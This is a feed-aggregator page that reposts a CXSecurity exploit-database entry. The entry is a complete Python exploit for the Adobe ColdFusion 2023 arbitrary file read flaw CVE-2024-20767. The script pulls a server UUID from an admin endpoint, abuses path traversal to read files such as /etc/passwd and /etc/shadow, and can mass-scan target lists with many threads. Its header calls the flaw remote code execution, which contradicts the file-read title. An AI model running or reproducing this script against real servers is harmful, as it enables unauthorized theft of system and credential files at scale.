惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

D
DataBreaches.Net
Apple Machine Learning Research
Apple Machine Learning Research
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
S
SegmentFault 最新的问题
博客园 - 聂微东
罗磊的独立博客
W
WeLiveSecurity
博客园_首页
Scott Helme
Scott Helme
V
Visual Studio Blog
T
The Exploit Database - CXSecurity.com
G
Google Developers Blog
大猫的无限游戏
大猫的无限游戏
Latest news
Latest news
L
Lohrmann on Cybersecurity
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
A
About on SuperTechFans
F
Full Disclosure
Y
Y Combinator Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
博客园 - 司徒正美
博客园 - Franky
C
CXSECURITY Database RSS Feed - CXSecurity.com
F
Fortinet All Blogs
Blog — PlanetScale
Blog — PlanetScale
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
阮一峰的网络日志
阮一峰的网络日志
S
Schneier on Security
雷峰网
雷峰网
博客园 - 【当耐特】
P
Privacy International News Feed
C
Cyber Attacks, Cyber Crime and Cyber Security
Engineering at Meta
Engineering at Meta
aimingoo的专栏
aimingoo的专栏
MongoDB | Blog
MongoDB | Blog
J
Java Code Geeks
T
Tor Project blog
V
V2EX
爱范儿
爱范儿
C
Check Point Blog
T
Threatpost
Project Zero
Project Zero
量子位
V
Vulnerabilities – Threatpost
Know Your Adversary
Know Your Adversary
I
Intezer
G
GRAHAM CLULEY
P
Privacy & Cybersecurity Law Blog
GbyAI
GbyAI
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Adobe ColdFusion 2023.6 Remote File Read
2025-07-28 · via The Exploit Database - CXSecurity.com

Adobe ColdFusion 2023.6 Remote File Read

# Exploit Title: Adobe ColdFusion 2023.6 - Remote File Read # Exploit Author: @İbrahimsql # Exploit Author's github: https://github.com/ibrahmsql # Description: ColdFusion 2023 (LUcee) - Remote Code Execution # CVE: CVE-2024-20767 # Vendor Homepage: https://www.adobe.com/ # Requirements: requests>=2.25.0, urllib3>=1.26.0 # Usage: python3 CVE-2024-20767.py -u http://target.com -f /etc/passwd #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import re import urllib3 import requests import argparse from urllib.parse import urlparse from concurrent.futures import ThreadPoolExecutor, as_completed urllib3.disable_warnings() class ColdFusionExploit: def __init__(self, output_file=None, port=8500): self.output_file = output_file self.port = port self.verbose = True self.session = requests.Session() def print_status(self, message, status="*"): colors = {"+": "\033[92m", "-": "\033[91m", "*": "\033[94m", "!": "\033[93m"} reset = "\033[0m" print(f"{colors.get(status, '')}{status} {message}{reset}") def normalize_url(self, url): if not url.startswith(('http://', 'https://')): url = f"http://{url}" parsed = urlparse(url) if not parsed.port: url = f"{url}:{self.port}" return url.rstrip('/') def get_uuid(self, url): endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat" try: response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10) if response.status_code == 200: match = re.search(r"<var name='uuid'><string>(.+?)</string></var>", response.text) if match: uuid = match.group(1) if self.verbose: self.print_status(f"UUID: {uuid[:8]}...", "+") return uuid except Exception as e: if self.verbose: self.print_status(f"Error: {e}", "-") return None def read_file(self, url, uuid, file_path): headers = {"uuid": uuid} endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100" try: response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10) if response.status_code == 200 and response.text.strip() != "[]": return response.text except: pass return None def test_files(self, url, uuid): files = { "Linux": ["etc/passwd", "etc/shadow", "etc/hosts"], "Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"] } for os_name, file_list in files.items(): for file_path in file_list: content = self.read_file(url, uuid, file_path) if content: self.print_status(f"VULNERABLE: {url} - {os_name} - {file_path}", "+") if self.verbose: print(content[:200] + "..." if len(content) > 200 else content) print("-" * 50) if self.output_file: with open(self.output_file, "a") as f: f.write(f"{url} - {os_name} - {file_path}\n") return True return False def exploit_custom_file(self, url, uuid, custom_file): content = self.read_file(url, uuid, custom_file) if content: self.print_status(f"File read: {custom_file}", "+") print(content) return True else: self.print_status(f"Failed to read: {custom_file}", "-") return False def exploit(self, url, custom_file=None): url = self.normalize_url(url) if self.verbose: self.print_status(f"Testing: {url}") uuid = self.get_uuid(url) if not uuid: if self.verbose: self.print_status(f"No UUID: {url}", "-") return False if custom_file: return self.exploit_custom_file(url, uuid, custom_file) else: return self.test_files(url, uuid) def scan_file(self, target_file, threads): if not os.path.exists(target_file): self.print_status(f"File not found: {target_file}", "-") return with open(target_file, "r") as f: urls = [line.strip() for line in f if line.strip() and not line.startswith('#')] self.print_status(f"Scanning {len(urls)} targets with {threads} threads") self.verbose = False vulnerable = 0 with ThreadPoolExecutor(max_workers=threads) as executor: futures = {executor.submit(self.exploit, url): url for url in urls} for future in as_completed(futures): url = futures[future] try: if future.result(): vulnerable += 1 print(f"[+] {url}") else: print(f"[-] {url}") except Exception as e: print(f"[!] {url} - Error: {e}") self.print_status(f"Scan complete: {vulnerable}/{len(urls)} vulnerable", "+") def main(): parser = argparse.ArgumentParser(description="ColdFusion CVE-2024-20767 Exploit") parser.add_argument("-u", "--url", help="Target URL") parser.add_argument("-f", "--file", help="File with target URLs") parser.add_argument("-p", "--port", type=int, default=8500, help="Port (default: 8500)") parser.add_argument("-c", "--custom", help="Custom file to read") parser.add_argument("-o", "--output", help="Output file") parser.add_argument("-t", "--threads", type=int, default=20, help="Threads (default: 20)") parser.add_argument("-q", "--quiet", action="store_true", help="Quiet mode") args = parser.parse_args() if not args.url and not args.file: parser.print_help() return exploit = ColdFusionExploit(args.output, args.port) exploit.verbose = not args.quiet if args.url: exploit.exploit(args.url, args.custom) elif args.file: exploit.scan_file(args.file, args.threads) if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}